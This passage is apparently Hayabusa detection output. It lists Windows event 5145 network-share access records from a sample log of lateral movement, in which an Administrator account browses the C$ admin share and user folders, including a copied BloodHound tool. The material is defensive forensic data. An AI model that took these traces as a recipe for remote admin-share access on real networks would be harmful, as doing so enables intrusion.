Path: Users\Public\Recorded TV\Sample Media | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$ | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links\desktop.ini | IP Addr: 
10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Documents | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Pictures | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\server01$\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\sshd_server\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome | IP Addr: 10.0.2.15 | LID: 0xfc635,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
